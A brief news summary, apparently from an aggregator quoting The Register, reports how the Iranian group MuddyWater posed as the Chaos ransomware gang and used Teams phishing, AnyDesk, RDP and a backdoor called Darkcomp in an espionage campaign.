"While connected, the [threat actor (TA)] executed basic discovery commands, accessed files related to the victim's VPN configuration, and instructed users to enter their credentials into locally-created text files."
"In at least one instance, the TA also deployed a remote management tool (AnyDesk) to further facilitate access."
"Armed with valid credentials, the attackers then executed various commands via RDP, which downloaded payloads using curl."
"These payloads included a backdoor malware dubbed Darkcomp, a malicious Microsoft WebView2 loader to disguise traffic, and an encrypted configuration file that sent instructions to Darkcomp."
Researchers identified an Iranian intelligence cyber unit, MuddyWater, masquerading as the Chaos ransomware gang to conduct espionage. The operation began with a Microsoft Teams phishing campaign, convincing targets to share screens and enter credentials into local text files. Attackers accessed VPN configurations and deployed remote management tools like AnyDesk. They used phishing pages to capture credentials, executed commands via RDP, and downloaded backdoor malware, including Darkcomp, to facilitate lateral movement and data exfiltration.
Read at theregister
Unable to calculate read time
Collection
[
|
...
]